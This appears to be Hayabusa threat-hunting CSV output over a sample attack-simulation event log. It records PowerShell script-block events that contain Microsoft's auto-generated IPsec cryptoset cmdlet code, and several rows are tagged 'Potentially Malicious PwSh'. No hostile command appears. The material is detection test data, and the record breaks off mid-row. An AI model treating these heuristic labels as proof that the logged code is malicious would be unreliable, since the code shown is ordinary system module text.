value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.286 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 